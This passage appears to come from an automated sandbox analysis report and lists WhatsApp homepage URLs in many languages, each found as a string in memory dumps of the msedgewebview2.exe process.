                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=ar
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=az
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=bg
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=bn
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=ca
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=cs
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=da
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=de
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=el
                  Source: msedgewebview2.exe, 0000001D.00000002.3691899074.00002DDC0012C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2581175981.00002DDC014F0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=en
                  Source: msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=en-
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=es
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=et
                  Source: msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=etad_check
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=fa
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=fi
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=fr
                  Source: msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=frhttps://www.whatsapp.com/?lang=es
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=ga
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=gu
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=he
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=hi
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=hr
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=hu
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=id
                  Source: msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=idaticmap
                  Source: msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=it
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=ja
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=kk
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=kn
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=ko
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=lt
                  Source: msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=lthttps://www.whatsapp.com/?lang=lv
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=lv
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=mk
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=ml
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=mr
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=ms
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=nb
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=nl
                  Source: msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=nl-
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=pa
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=pl
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=pt_br
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=pt_pt
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=ro
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=ru
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=sk
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=sl
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=sq
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=sr
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=sv
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=sw
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=ta
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=te
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=th
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=tl
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=tr
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=uk
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=ur
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=uz
